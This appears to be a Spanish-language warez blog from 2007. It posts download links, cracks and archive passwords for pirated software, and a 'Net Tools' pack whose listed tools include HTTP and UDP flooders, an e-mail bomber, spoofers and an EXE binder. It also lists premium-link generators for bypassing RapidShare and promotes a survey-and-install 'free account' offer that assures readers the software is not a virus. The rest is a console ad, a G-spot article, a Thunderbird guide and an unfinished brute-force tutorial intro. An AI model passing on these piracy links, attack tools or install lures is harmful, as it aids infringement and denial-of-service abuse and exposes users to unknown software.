| Mobile| RSS

Envenenamiento via web

lunes, 24 de diciembre de 2007 | Tags: | 4 comentario [ Mas... ]

Net Tools 5.0.70 Full

Net Tools 5.0.70
He visto otros post en T! sobre este pack freeware de herramientas destinadas a la seguridad y administración de redes, pero con versiones anteriores y sin previews.
Para los que desconocen, se trata de un conjunto de programas destinados a supervisar y encontrar agujeros de seguridad en un entorno de red.
Principalmente los programas fueron desarrollados en Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET


Algunos previews:






Un listado de algunas herramientas incluídas:
1. IP Address Scanner
2. IP Calculator
3. IP Converter
4. Port Listener
5. Port Scanner
6. Ping
7. NetStat (2 ways)
8. Trace Route (2 ways)
9. TCP/IP Configuration
10. Online - Offline Checker
11. Resolve Host & IP
12. Time Sync
13. Whois & MX Lookup
14. Connect0r
15. Connection Analysator and protector
16. Net Sender
17. E-mail seeker
18. Net Pager
19. Active and Passive port scanner
20. Spoofer
21. Hack Trapper
22. HTTP flooder (DoS)
23. Mass Website Visiter
24. Advanced Port Scanner
25. Trojan Hunter (Multi IP)
26. Port Connecter Tool
27. Advanced Spoofer
28. Advanced Anonymous E-mailer
29. Simple Anonymous E-mailer
30. Anonymous E-mailer with Attachment Support
31. Mass E-mailer
32. E-mail Bomber
33. E-mail Spoofer
34. Simple Port Scanner (fast)
35. Advanced Netstat Monitoring
36. X Pinger
37. Web Page Scanner
38. Fast Port Scanner
39. Deep Port Scanner
40. Fastest Host Scanner (UDP)
41. Get Header
42. Open Port Scanner
43. Multi Port Scanner
44. HTTP scanner (Open port 80 subnet scanner)
45. Multi Ping for Cisco Routers
46. TCP Packet Sniffer
47. UDP flooder
48. Resolve and Ping
49. Multi IP ping
50. File Dependency Sniffer
51. EXE-joiner (bind 2 files)
52. Encrypter
53. Advanced Encryption
54. File Difference Engine
55. File Comparasion
56. Mass File Renamer
57. Add Bytes to EXE
58. Variable Encryption
59. Simple File Encryption
60. ASCII to Binary (and Binary to ASCII)
61. Enigma
62. Password Unmasker
63. Credit Card Number Validate and Generate
64. Create Local HTTP Server
65. eXtreme UDP Flooder
66. Web Server Scanner
67. Force Reboot
68. Webpage Info Seeker
69. Bouncer
70. Advanced Packet Sniffer
71. IRC server creater
72. Connection Tester
73. Fake Mail Sender
74. Bandwidth Monitor
75. Remote Desktop Protocol Scanner
76. MX Query
77. Messenger Packet Sniffer
78. API Spy
79. DHCP Restart
80 File Merger
81. E-mail Extractor (crawler / harvester bot)
82. Open FTP Scanner
83. Advanced System Locker
84 Advanced System Information
85. CPU Monitor
86 Windows Startup Manager
87. Process Checker
88. IP String Collecter
89. Mass Auto-Emailer (Database mailer; Spammer)
90. Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91. Fishing Port Scanner (with named ports)
92. Mouse Record / Play Automation (Macro Tool)
93. Internet / LAN Messenger Chat (Server + Client)
94. Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95. Hash MD5 Checker
96. Port Connect - Listen tool
97. Internet MAC Address Scanner (Multiple IP)
98. Connection Manager / Monitor
99. Direct Peer Connecter (Send/Receive files + chat)



100. Force Application Termination (against Viruses and Spyware)
101. Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102. COM Detect and Test
103. Create Virtual Drives
104. URL Encoder
105. WEP/WPA Key Generator
106. Sniffer.NET
107. File Shredder
108. Local Access Enumerater
109. Steganographer (Art of hiding secret data in pictures)
110. Subnet Calculater
111. Domain to IP (DNS)
112. Get SNMP Variables
113. Internet Explorer Password Revealer
114. Advanced Multi Port Scanner
115. Port Identification List (+port scanner)
116. Get Quick Net Info
117. Get Remote MAC Address
118. Share Add
119. Net Wanderer
120. WhoIs Console
121. Cookies Analyser
122. Hide Secret Data In Files
123. Packet Generator
124. Secure File Splitting
125. My File Protection (Password Protect Files, File Injections)
126. Dynamic Switch Port Mapper
127. Internet Logger (Log URL)
128. Get Whois Servers
129. File Split&Merge
130. Hide Drive
131. Extract E-mails from Documents
132. Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer’s IP, Wake On LAN)
133. Hook Spy
134. Software Uninstaller
135. Tweak & Clean XP
136. Steganographic Random Byte Encryption
137. NetTools Notepad (encrypt your sensitive data)
138. File Encrypter/Decrypter
139. Quick Proxy Server
140. Connection Redirector (HTTP, IRC, … All protocols supported)
141. Local E-mail Extractor
142. Recursive E-mail Extractor
143. Outlook Express E-mail Extractor
144. Telnet Client
145. Fast Ip Catcher
146. Monitor Host IP
147. FreeMAC (MAC Address Editor)
148. QuickFTP Server (+user accounts support)
149. NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150. Network Protocol Analyzer
151. Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152. WebMirror (Website Ripper)
153. GeoLocate IP
154. Google PageRank Calculator
155. Google Link Crawler (Web Result Grabber)
156. Network Adapter Binder
157. Remote LAN PC Lister
158. Fast Sinusoidal Encryption
159. Software Scanner
160. Fast FTP Client
161. Network Traffic Analysis
162. Network Traffic Visualiser
163. Internet Protocol Scanner
164. Net Meter (Bandwidth Traffic Meter)
165. Net Configuration Switcher
166. Advanced System Hardware Info
167. Live System Information
168. Network Profiler
169. Network Browser
170. Quick Website Maker and Web Gallery Creator
171. Remote PC Shutdown
172. Serial Port Terminal
173. Standard Encryptor
174. Tray Minimizer
175. Extra Tools (nmap console & win32 version)

El pack pesa 25 MB. y es compatible con Windows 98, NT, 2000, 2003, XP y Vista.

Descargar
Link

Alternativas
Alternativa 1
Alternativa 2
Alternativa 3


Se necesita tener instalado .Net Framework que se puede descargar desde acá:
Descarga

martes, 11 de diciembre de 2007 | Tags: | 0 comentario [ Mas... ]

Super Todo EN Uno V3.0 Window



Peso Comprimido:6.59 GB
Peso al descomprimir: 7.30 GB(DVD9) Opcion de crear DVD Appz(DVD 5) Y otro DVD Sistemas Operativos(DVD 5)
Todos los sistemas operativos estan en Español.. Suites Office Español,algunos programas estan en ingles pero la mayoria en español!!


SISTEMAS OPERATIVOS!!
-Microsoft Windows Vista
-Microsoft windows Xp Pro Sp2
-Micrososft Windows Xp Home Edition Sp2
Sistemas Operativos LITE
-Micrososft Windows Xp Lite Pro con Sp2
-Micrososft Windows VIsta Ultimate Lite


Adobe Macromedia Suite CS3
-Dreamweaver Cs3
-Fireworks Cs3
-Flash CS3
-Adobe Photoshop Cs3


Suites Offimatica
-Office 2007
-Office 2003 Con Sp2

SEGURIDAD
ANTIVIRUS
NOD32 2.7
Panda Antivirus 2007
BitDefender Internet Security v10
Norton Antivirus 2007
MCAfee Virus-Scan Plus v11 2007
Norton 360 all in one
Kaspersky Anti-virus 7.0.0.90
AVG Free Edition 7.5.467
Windows Defender 1.1.1593
ANTISPYWARE / Adware
Spyware Doctor 5.0.0.179
Webroot Spy Sweeper v5.3
Ad-Aware 2007
Spybot Search and Destroy 1.4
AVG Anti-Spyware 7.5.0.50
SpywareBlaster 3.5.1
SuperAntiSpyware 3.7.1018
Spyware Terminator 1.9.2.134
Rootkit Revealer 1.71
CWShredder 2.19
a-squared Free 2.1
Desinfectar Memorias Usb
Mx One 2.2.0.0 HECHO EN MEXICO


-------------------
Windows Genuine Advantage
-------------------

Office Genuine Advantage
Windows Xp Genuine Advantage
Vista Genuine Advantage




-------------------
INTERNET!!!
-------------------

++++++++++++++++++
Exploradores
++++++++++++++++++
Microsoft Internet Explorer 7
Mozilla Firefox 2.0.0.3
Opera 9.2
Netscape 7.0
+++++++++++++++++
Aplicaciones Internet
+++++++++++++++++
Mass Downloader v3.3.681
FlashGet Version 1.82.1003
FlashFXP 3.4.0


-------------------
COMPRESORES!!!!!
-------------------

Winrar 3.7
WinZip Pro v11.0
KGB Archiver 1.2.1.24
7-Zip 4.45
IZArc 3.71
WinUHA 2.0
IZArc 3.71


-------------------
UTILIDADES DE GRABACION!!!!
-------------------

Alcohol 120% 1.9.6.4719
Nero 7.7.5.1
DVDFab Platinum 3.0.9.8
CloneDVD v2.9.0.1 Multilenguaje
AnyDVD v6.0.5.0 Multilenguaje
Nero 7 Lite 7.8.5.0 Español
Nero 7 Micro 7.8.5.0 Español



-------------------
REPRODUCTORES!!!
-------------------

Winamp 5.33 Full
Windows Media Player 11
BlazeDVD Professional 5.0.0.1
Intervideo WinDVD Platinum v8.0.6.24
DivX Pro (incl. DivX Player) 6.6.0

-------------------
THEMES!!!!
-------------------


FlyakiteOSX v3.0.exe
Cristal Cleaner XP
Vista Inspirat
Long Horn Inspirat
Cristal Xp

-------------------
UTILIDADES DEL SISTEMA!!!
-------------------

DeepFreeze Enterprise v6.2
Partition Magic 8
Driver Genius Pro Edition 2007 7.0
Clean Slate V4
Norton Ghost 12
O&O Defrag Professional 10
-------------------
EXTRAS!!!
-------------------


Microsoft DirectX 9.0c (April 2007)
Microsoft .NET Framework 2.0
UltraISO v8.6.2.2011
Codec Pack Elisoft 14.0
Microsoft Virtual PC 2007
UltraEdit-32 v13.00a
Serv-U FTP Server v6.4.0.4 Corp
Sun Java Virtual Machine 6.0 update1
Recover My Files 3.98
PowerArchiver 2007 v10.10.8
DAEMON Tools 4.09.1
GMail Drive 1.0.11
Unlocker1.8.5
Ciber Boss 4.6
Everest Corporate Edition 4.00.976
Super 2007 video/audio
VIP Files Protector v1.0
Hard Disk Sentinel Professional 2.05
PC Tools Desktop Mechanic 2.0.0.268
MagicISO Maker v5.4.237
DamnNFOViewer
HideIP.Platinum3.31
Undelete Plus 2.53
doPDF v5.1.220
Mediacoder V0.6.0.3698
Pandora Recovery v0.9.33
Simplygest Pro v4.2.0.11.05
PDF Password Remover v3.0
Solid Converter PDF Professional 3.0



++++++++++++++++++++++
Utilidades De Optimizacion
+++++++++++++++++++++
Registry Mechanic v6.0.0.780
TuneUp Utilities 2007 6.0.1256
Errorkiller 2006
WinASO Registry Optimizer 3.0.9
XP Repair Pro 2007 Build 3.5.4
CCleaner 1.40.520
MindSoft Utilities XP 9.8
Your Uninstaller 2006

++++++++++++++++++++++
OPCIONES CREAR ISO!
+++++++++++++++++++++

+Sistemas Operativos
Microsoft Window Xp Professional Con Sp2
Microsoft Window Xp Home Edition Con Sp2
Microsoft Window Vista

+Sistemas Operativos Lite
Microsoft Window Xp Lite Edition Con Sp2
Microsoft Window Vista Lite Edition


Suites y Programas
Microsoft Office 2007
Adobe Macromedia Suite
Adobe Photoshop Cs3
Norton 360 All In One

Tools Boteables
Hirens Boot Cd 9

DVD Individuales
DVD1 appz
DVD2 S.O.

SUPER TODO EN UNO 3





Carpeta con los link

pass
--//para todos mis amigos//--

LIBRO MIO MAXMASTER

AQUI ESTA UN LIBRO ESPERO QUE LE GUSTE
HACKED HACKED

http://rapidshare.com/files/75883375/LIBRO.zip.html

"AnyDVD + AnyDVD HD v6.1.2.8"



AnyDVD Es un manejador capaz de descifrar DVDs de video (películas) en forma automática y transparente para el usuario. La cpia del DVD aparece desprotegida y con código de región libre en todas las aplicaciones, así como también para el sistema operativo Windows. AnyDVD ayuda a herramientas de copiado como CloneDVD, Pinnacle Instant Copy, InterVideo DVD-Copy, etc. a ser capaces de copiar películas con protección CSS. Con la ayuda de AnyDVD podrás ver películas que no coincidan con el código de región de tu programa reproductor de DVD favorito, ¡Sin importar cual sea!.

AnyDVD no solamente descodifica DVDs: ¡AnyDVD te permite también reproducir, copiar y extraer pistas de CDs de Audio protegidos!
Pero AnyDVD hace mucho más. Por ejemplo: Te hace posible controlar la velocidad de rotación de tu unidad de DVD, ¡De esta forma puedes ver DVDs en tu computadora con muy poca interferencia!.
AnyDVD es el perfecto aliado de tu HTPC (Home Theater PC). Puede prevenir la ejecución automática de programas de tus DVD de video (ejemplo: PC-Friendly o PC Amigable) y puedes definir qué programas se ejecuten al insertar o quitar un disco. AnyDVD puede ajustar la frecuencia de actualización (refresco) vertical de tu monitor (ejemplo: 72 Hz con NTSC y 75 Hz con PAL) en forma automática si lo deseas!

AnyDVD puede quitar las restricciones para usuarios no deseadas, ejemplo: Puede quitar subtítulos forzados o saltar los mensajes de copyright y advertencias del FBI.

Caracteristicas:

-Trabaja automáticamente como un controlador en segundo plano.
-Quita encriptación (CSS) y código de región (RPC) de los DVDS
-Quita la protección analógica contra copia (Macrovision)
-Quita la prohibición a operaciones del usuario como subtítulos forzados y otras limitaciones
-Decripta SIN tener que salvar los datos en el disco duro
-Decripta "al vuelo"
-Previene la ejecución automática de programas de sus DVDs de video (ejemplo., PC-Friendly - PC amigable)
-Permite establecer la frecuencia de refresco vertical dependiendo del material de video
-Permite la ejecución de programas al insertar o quitar un disco
-Permite el control de velocidad de su unidad de DVD
-Trabaja con todos los DVDs
-Trabaja con todas la unidades de DVD, sin importar el código de región tengan
-Trabaja con todos los programas copiadores y reproductores de DVD (por ejemplo: CloneDVD)
-Trabaja en forma transparente para el sistema operativo. Los DVDs pueden ser compartidos en la red Local. Ellos podrán ser copiados después con comandos normales o con Windows Explorer, etc.
-Ha demostrado ser estable y rápido, no necesita un controlador ASPI (ASPI driver).
-Nueva característica AnyCDDA: ¡Reproduce, copia y extrae pistas de los CDs de Audio protegidos!

Para saber las caracteristicas del AnyDVD HD visita la Pagina del Autor

**Descargar Desde RapidShare (Pack: AnyDVD + AnyDVD HD):::
anydvd-anydvd_hd

miércoles, 3 de octubre de 2007 | Tags: | 2 comentario [ Mas... ]

Themes Creator 3.11 for Sony Ericsson



**Descargar desde RapidShare::
Themes_creator-sonyEricsson__vdp

"Virtual DJ 4.3 + Parche"






Bienvenido a VirtualDJ, el programa para DJ que al mismo tiempo el más fácil y poderoso en el mercado.

Sencillisimo: ajustandose a una motor de interfase evolutiva, el "look and feel" de VirtualDJ adaptandose a si mismo a el nivel de usted. Empezando con un skin (piel) fácil de usar para aprender, y luego puedrá escojer entre las docenas de pieles disponibles en este website, desde el más simple hasta el más complejo de ellos.

Poderoso: VirtualDJ es el único software hoy que proveé:- Una clara visualización de los golpes o beats de la música- Un sampler sincronizado para hacer remixes en vivo de manera intuitiva- Mezcla y scratch con Video clips musicales, con una fluidés sin paralelo- Con tecnología anti-skip, cuando se hace scratch con los viniles de código de tiempo (TCVs)- Y muchas otras extraordinaras características y ventajas que usted descubrirá pronto...

No lo dude ya, existe una razón por la cual VirtualDJ a sido adoptado por más de 4,000,000 de usuarios en el mundo, haciéndolo el programa para DJ más usado en el mercado.

Muy Bueno...

**Descargar desde RapidShare::
virtual_dj+pathc__vdp

*Pass: www.djhunter505.3wp.es

| Tags: | 0 comentario [ Mas... ]

CloneDVD 2.9.0.3 ESP FULL Ultima Version + CRACK"



CloneDVD 2 Copia películas con una calidad de imagen inigualable. Ya sea solamente la película principal o un DVD completo; CloneDVD es capaz de comprimir videos muy largos manteniendo una calidad brillante y hacerlo en muy alta velocidad: Una tecnología muy especial de transcodificación comprime automáticamente a un tamaño destino ajustable cualquier DVD de acuerdo al audio y lenguaje deseado. Nuestro singular asistente tipo film te guiará paso a paso a través de todas las configuraciones. Con la ayuda del previsualizador de video podrás decidir que partes del DVD copiar y/o que partes tener en capítulos individuales. Las Barras de calidad muestran la influencia directa en el video y lenguaje seleccionado en cuanto a la calidad de la copia. Incluso los principiantes tendrán siempre excelentes resultados. Para copiar películas en DVD protegidos necesita la ayuda de AnyDVD (Incluido en el Paquete de Descarga)

El Programa Me funciona de una manera correcta, tiene una interfaz facil de Usar...y pos ayuda para aquellos que no tenen dinero y quieren quemar alguna pelicula....El CloneDVD funciona en conjunto al AnyDVD (por eso lo anexe!!)...y tambien anexe el CloneVirtualDrive que tiene la funcion de un disco duro virtual, por si quieres tener l pelicula en formato ISO en tu PC...

*Descargar Aka::
MegaUpload - RapidShare

CloneCD v 5.3.0.1 + crack

http://elrincondelasdescargas.files.wordpress.com/2007/06/clone-cd.jpg

CloneCD is a powerful CD copying program. It writes in Raw mode, which allows it to have total control over the data written. Therefore, CloneCD can produce real, one-to-one copies of your CDs. Because of its special operation, CloneCD requires a CD writer that is capable of writing in this mode. Further, CloneCD requires a CD reader (CD-R) that supports some specific commands. With the correct equipment, CloneCD is able to make working copies of any CD

Download
http://rapidshare.com/files/47114108/Clone_CD.rar


Coreldraw X3 Multilenguage Full, Versión FULL

Versión completa de este programa que no requiere activarse por ningun medio. Incluye serial. Y es multilenguage incluido el español. No me pidio activación despues de instalar así que se ahorra el proceso ese. Este es el programa aunque la Suite completa incluye 3 CD más de varios contenidos. SUBIDOS TODOS!.

El CD 1 es el CD de instalación. Si no quieres bajar todos puedes bajar solo este y usar el programa con toda comodidad sin necesidad de tener todos los CD, ya que los tres restantes son CDs que incluyen recursos adicionales.
Pass del primer CD, "chilewarez" sin comillas.
El resto de CDs el pass es: "4_all_by_wolverine" sin comillas también.




Descarga:
http://rapidshare.com/files/13083655/CDX3.part1.rar
http://rapidshare.com/files/13185978/CDX3.part2.rar
http://rapidshare.com/files/13190677/CDX3.part3.rar


El CD 2 contiene imágenes clipart seleccionadas inteligentemente y recursos adicionales tales como marcos, patrones, listas de diseminador y mosaico. Puede usar la ventana acoplable Carpeta de recortes para encontrar clipart con toda facilidad. Para abrir la ventada acoplable Carpeta de recortes y buscar contenido, haga clik en Ventana > Ventanas acoplables > Carpeta de recortes > Buscar



Descarga:
http://rapidshare.com/files/25719897/CDX3-CLPART.part1.rar
http://rapidshare.com/files/25713548/CDX3-CLPART.part2.rar
http://rapidshare.com/files/25704899/CDX3-CLPART.part3.rar
http://rapidshare.com/files/25357981/CDX3-CLPART.part4.rar
http://rapidshare.com/files/25357167/CDX3-CLPART.part5.rar


El CD 3 contiene fuentes, fotos y objetos fotográficos. También puede utilizar texturas de pincel con herramientas de Medios artísticos en CorelDRAW y listas de imágenes para diseminar en Corel PHOTO-PAINT. Para poder usar las fuentes debe instalarlas primero. Puede utilizar Bitstream Font Navigato, incluido en esta versión, para instalar fuentes. Puede usar la ventana acoplable Carpeta de recortes para buscar fotos y objetos fotográficos con toda facilidad.





DEscarga:
http://rapidshare.com/files/25860513/CDX3-PHOTOS.part1.rar
http://rapidshare.com/files/25869813/CDX3-PHOTOS.part2.rar
http://rapidshare.com/files/25860455/CDX3-PHOTOS.part3.rar
http://rapidshare.com/files/25846175/CDX3-PHOTOS.part4.rar
http://rapidshare.com/files/25844842/CDX3-PHOTOS.part5.rar
http://rapidshare.com/files/25813185/CDX3-PHOTOS.part6.rar


El CD 4, es el bonus CD, contiene CorelDRAW Design Collection. Incluido el número de serie en el CD. CorelDRAW Design Collection contiene más de 100 plantillas profesionales de diferentes estilos y diseños que puede utilizar en CorelDRAW.




Descarga:
http://rapidshare.com/files/25137740/CDX3BONUS.part1.rar
http://rapidshare.com/files/25164233/CDX3BONUS.part2.rar
http://rapidshare.com/files/25280916/CDX3BONUS.part3.rar
http://rapidshare.com/files/25323487/CDX3BONUS.part4.rar
http://rapidshare.com/files/25323783/CDX3BONUS.part5.rar
http://rapidshare.com/files/25151709/CDX3BONUS.part6.rar


Pass para todo:

4_all_by_wolverine

CuteFTP Pro 8.0.5



Para inaugurar mi blog, aqui está mi primer aporte para todos mis visitantes, es nada más y nada menos que uno de los más utilizados clientes FTP (File Transfer Protocol) sin duda alguna CuteFTP además de ofrecer una sencilla interfaz cuenta con muchas herramientas todas muy útiles a la hora de hacer nuestro trabajo.

Obtenlo, haciendo clic aquí.

Recordemos que los programas que aquí publicaré estarán totalmente completos es decir en su versión "full".

La contraseña para descomprimir el archivo es:
www.fifa-xtreme.com

martes, 2 de octubre de 2007 | Tags: | 1 comentario [ Mas... ]

Xbox+ 1Control,46 Juegos,10 Pelicula Originales, 200 Juegos de Super Nitendo + 160 De n64

http://www.linternaute.com/hightech/cadeaux/noel/consoles_jeux_video/images/consoles_salon/microsoft-xbox-g.jpg

VENTA DE CONSOLA JUEGOS XBOX CON MUCHAS JUEGOS Y EN ESPECIAL POR SOLO
7500$ pesos dominicanos. LA CONSOLA DEL XBOX INCLUYE 1 CONTROL,46 JUEGOS DE XBOX, 10 PELÍCULAS ORIGINALES,200 JUEGOS DE SUPER NINTENDO
,160 JUEGOS DE NINTENDO 64 N64

ESTA VENTA SOLO SE INCLUYEN EN REPÚBLICA DOMINICANA,SANTIAGO

PRECIO: 7500$
INFORMACION: DEJA TU COMENTARIO

El punto de Gräfenberg,


El punto de Gräfenberg, más conocido como punto G, llamado así en honor de su descubridor, el ginecólogo alemán Ernst Gräfenberg, es una pequeña zona del área genital de las mujeres localizada detrás del hueso púbico y alrededor de la uretra. Es lo mismo que, o parte de, la esponja uretral, donde se encuentran las glándulas de Skene.

Órganos reproductores de la mujer
Se dice que la
estimulación del punto G (a través de la pared frontal de la vagina) propicia un orgasmo más vigoroso y satisfactorio, y es posiblemente la causa de la eyaculación femenina. Tal estimulación requiere un empuje en cierto modo opuesto al que se necesita para lograr la máxima excitación clitorial con el pene.
Muchos libros sobre
sexo aconsejan a las parejas incapaces de lograr el orgasmo femenino el considerar la estimulación del punto G como técnica sexual.

lunes, 1 de octubre de 2007 | Tags: | 1 comentario [ Mas... ]

fakes scrips

domingo, 30 de septiembre de 2007 | Tags: | 0 comentario [ Mas... ]

Genenador de link Premiun


.de Link Generators

Www.Proxiez.Net
Max No of links you can generate daily : 5

Www.Rapidhack.Net
Max No of links you can generate daily : Unlimited

Www.Fedho.Com
Max No of links you can generate daily : Unknown

Www.Fastaccess.Ws

Max No of links you can generate daily : Unknown
You need To Register Wid them Before You Can Generate Links

Www.RapidsharePremiumLinkGenerator.Com
Max No of links you can generate daily : Unknown

.com Link Generators

Www.RapidFool.Com
Max No of links you can generate daily : Unknown

Www.Khongbiet.Com
Max No of links you can generate daily : Unknown

Www.Proxiez.Net
Max No of links you can generate daily : Unknown
Generator Is Still Being Tested


Www.Rapidlysharing.Com
Max No of links you can generate daily : 6

Www.Rapid-Hook.Com
Max No of links you can generate daily : 4

Www.FreeRsLinks.Com/
Max No of links you can generate daily : 100

Www.Rapidl.Com
Max No of links you can generate daily : 3

Www.RapidRip.Com
Max No of links you can generate daily : Unknown

Www.DownloadMyUpload.Com
Max No of links you can generate daily : 7

Www.ComputerAxes.Com
Max No of links you can generate daily : 2

Www.PremiumRapid.Com
Max No of links you can generate daily : Unknown

Www.Rapidshare.Co.In
Max No of links you can generate daily : 5

Www.Rapidshack.Us
Max No of links you can generate daily : Unknown

Www.Megaez.Com
Max No of links you can generate daily : Unknown

Www.RapidsharePremiumLinkGenerator.Com
Max No of links you can generate daily : Unknown

Www.Lcheat.Com
Max No of links you can generate daily : 3

Www.Rapid-Ripping.Com
Max No of links you can generate daily : 15

Www.Premium4Me.Com
Max No of links you can generate daily : Unknown

Www.Grab-W.Net
Max No of links you can generate daily : 5

Www.Rapid.Download-Crazy.Com
Max No of links you can generate daily : 8

Www.RapidLeech.com
Max No of links you can generate daily : Unknown

Www.RSLeecher.Com
Max No of links you can generate daily : 3

Www.FastLister.Net
Max No of links you can generate daily : 5

Www.LCheat.Com
Max No of links you can generate daily : 3

Www.X92.Org
Max No of links you can generate daily : Unknown

Www.RsProxy.Info
Max No of links you can generate daily : 5

Www.RsFox.Com
Max No of links you can generate daily : 5

Www.PremiumLinkz.Info
Max No of links you can generate daily : 5

Www.Rs43.Com
Max No of links you can generate daily : Unknown

Www.DirectRapid.Com
Max No of links you can generate daily : Unknown

Www.Dioscurionline.Net
Max No of links you can generate daily : 2

Www.FreeRapid.Org
Max No of links you can generate daily : Unknown

Www.Rapid4All.Com

Max No of links you can generate daily : 5

Www.RapidLeechers.Com
Max No of links you can generate daily : Unknown

Www.Warez-Premium.Org
Max No of links you can generate daily : 5

Www.Rapidshare2Hell.Co.Nr
Max No of links you can generate daily : Unknown

Www.RapidCheat.Com
Max No of links you can generate daily : 5

Www.NobakWaas.Com
Max No of links you can generate daily : Unknown

Www.Adomreg.Com
Max No of links you can generate daily : Unknown

Free Rapidshare Premium Account

Free Rapidshare Premium Account
(Refer Your Freinds And Win An Account)

This site provides you with a variety of ways to help you bypass the Rapidshare wait time. You can access our premium links maker on the Premium page. You can read our tutorial on the Rapidshare Grabber to learn how to download using that. Check our links for other Rapidshare related sites of interest.

After Registration, It Will Ask You To Complete A Survey, And Install A Software. Don't Wory It Is Not A Virus Or Spyware. Just Install That Small Software. You Can Delete It After 24 Hours. This Is Important, You Have To Take The Servey, And Install The Software In Order To Be Eligible For The Gift.

Visit This Site
Click Here

Or / And

Click Here

Proof 1 | Proof 2

Genenador de link

http://adomreg.com/#

esta buenisimoespero que leguste para poder descargar cuantas veces tu quieras y en directo 100%

Configurando un cliente de mail (Thunderbird)

http://icaix.com/front/wp-content/images/57.thumb.jpg

Te has parado a pensar alguna vez cuanto tiempo pierdes a diario accediendo a tus cuentas de email? Gracias a mozilla ThunderBird (o Icedove en Debian) podremos gestionar de una manera fácil, rapida y sencilla múltiples cuentas desde nuestro escritorio (aprox 2 min por cuenta).

Antes de mostraros como hacerlo, seria interesante que conocierais un poco los diferentes parámetros que nos iremos encontrando. Brevemente, voy a introduciros a aquellos conceptos basicos y necesarios con los que podréis configurar cualquier gestor de correo, no solo en Thunderbird, si no en cualquier otro.

Bien, lo primero que debemos entender es que solo hay dos cosas que podemos hacer con un email; Recibir y Enviar. Tiene sentido no? Ambos procesos son completamente independientes y por tanto habrá que configurarlos por separado.

Recepción emails

Cuando recibimos un email, normalmente hay un servidor de correo en alguna parte escuchando las 24 horas del día. Cuando recibe un mail, este es guardado hasta que usuario lo lee y decide cuando es el momento de eliminarlo.A día de hoy, la gestión del correo entrante se realiza normalmente con uno de los siguientes protocolos.

POP (Post Office Protocol), En este caso el servidor de correo es una zona de almacenamiento temporal para los emails entrantes. Una vez el usuario accede a su mail, este es transferido a su equipo, liberando el espacio ocupado en el servidor (su funcionamiento es similar al del buzón de correo en el sistema de correo tradicional).

Ventajas:

Minimo tiempo de conexión. Optimo para conexiones en las que se tarifa por minuto.
Mínimo uso de recursos de almacenamiento en el servidor (ya que una vez transferido se elimina)
Al estar el mail almacenado en tu equipo y podrás acceder a el sin necesidad de conectarte
Más extendido, y por tanto más software a su disposición.

Desventajas:

Solo se puede acceder al mail desde que el equipo desde el que te lo has descargado (malo si trabajas en varios equipos).
La mayoría de los servidores de correo que usan POP te permiten la opción de almacenar el mail en sus servidores, con el fin de evitar dicho problema. Ahora…, hay que tener cuidado a la hora de configurarlo si no quieres llevarte sorpresas.

IMAP (Internet Message Access Protocol), en vez de descargar los emails en el equipo del usuario, estos son guardados en el servidor, permitiendo al usuario acceder a el desde cualquier lugar de la red.

Ventajas:

Acceso desde múltiples equipo.
Descarga los emails solo cuando el usuario quiere leerlos (menor transferencia de datos)
Permite acceso “online”, “offline” o “disconnected”.

Si os dan la opción os recomiendo IMAP ya que los efectos de confundirse son menores.

Envió de mail

SMTP (Simple Mail Transfer Protocol). Solo tenemos una opción. Simplemente insertas el servidor de SMTP y listo. Por lo general con configurar un servidor de SMTP vale, sin embargo podremos configurar varios para posteriormente tener la opción de enviar mails desde diferentes “origenes”. Es servidor de SMTP se selecciona desde la pestaña “From” en la ventana de creación del mail.Dicho esto aquí os dejo los parametros de algunos de los servidores que os pueden interesar. Los que tengáis varias cuentas dentro de un mismo proveedor (véase gmail), no os preocupéis ya que podréis crear múltiples cuentas en paralelo.

Google Gmail

Tu Nombre: NombreQueQuierasQueSalgaEnElCampoFrom
Email Address: tuEmail@gmail.com
Tipo de Servidor de entrada: POP
Incoming Server: pop.gmail.com (SSL, puerto 995)
Outgoing Server: smtp.gmail.com (TLS, puerto 587)
Incoming User Name: tuEmail@gmail.com
Outgoing User Name: tuEmail@gmail.com

Guia oficial gmail. Aqui
Ver video tutorial icaix! Aqui

Upcomillas mail

Tu Nombre: NombreQueQuierasQueSalgaEnElCampoFrom
Email Address: tuEmail@alumnos.upcomillas.es
Tipo de Servidor de entrada: POP/IMAP
Incoming Server: alumnos.upcomillas.es (SSL, puerto 995, opcional)
Outgoing Server: alumnos.upcomillas.es
Incoming User Name: 200-XXX-XXX (numero de alumno)
Outgoing User Name: 200-XXX-XXX (numero de alumno)

Pagina de ayuda STIC Aquí.
Ver video tutorial icaix! Aqui

Microsoft Hotmail y Yahoo mail.

Este servicio, en principio, solo lo ofrecen a usuarios “Premium” y por tanto no esta disponible al público en general. Si que es cierto que hay plugins que permiten la descarga vía http.
Si hay interés, seguramente escriba una expansión de este “mini tutorial” mostrándoos como hacerlo.
Para los impacientes, Aquí os dejo un link a uno de esos plugins

Bueno, pues eso es todo. Realmente es mas sencillo de configurar de lo que parece. Yo ahora después de 6 meses usándolo me pregunto el porque no lo había probado antes. La verdad es ahorra mucho tiempo, te permite el control de varias cuentas simultáneamente, y lo mejor es que te avisa cuando recibes un nuevos emails. Os recomiendo que lo probéis ya que seguramente cambiara vuestros hábitos del uso del email.

sábado, 29 de septiembre de 2007 | Tags: | 0 comentario [ Mas... ]

Video Tutorial: Backtrack 2 | Remote brute force attack

Una de las responsabilidades de los administradores de sistemas es limitar el acceso a aquellos usuarios con autorización para entrar en el mismo. Con el fin de bloquear el acceso a terceros se crearon las contraseñas. Cada usuario posee un ‘nombre de usuario’ y una contraseña. Cada vez que un usuario quiere acceder al sistema se le piden dichos datos. Si el nombre de usuario y la contraseña coinciden con los almacenados en el servidor le permitimos el acceso, si no, se lo denegamos.

Uno de los problemas de este sistema surge cuando una tercera persona se hace pasar por uno de nuestros usuarios. Siempre y cuando conozca el nombre de usuario y su password se le permitirá el acceso, independientemente de que la persona no sea quien dice ser.

Otro problema es que si el acceso a sido denegado, el usuario puede volver a intentar acceso n numero de veces (normalmente n es infinito). Por lo general, limitar el número de intentos puede bloquearnos el acceso, haciendo del remedio peor que la enfermedad.

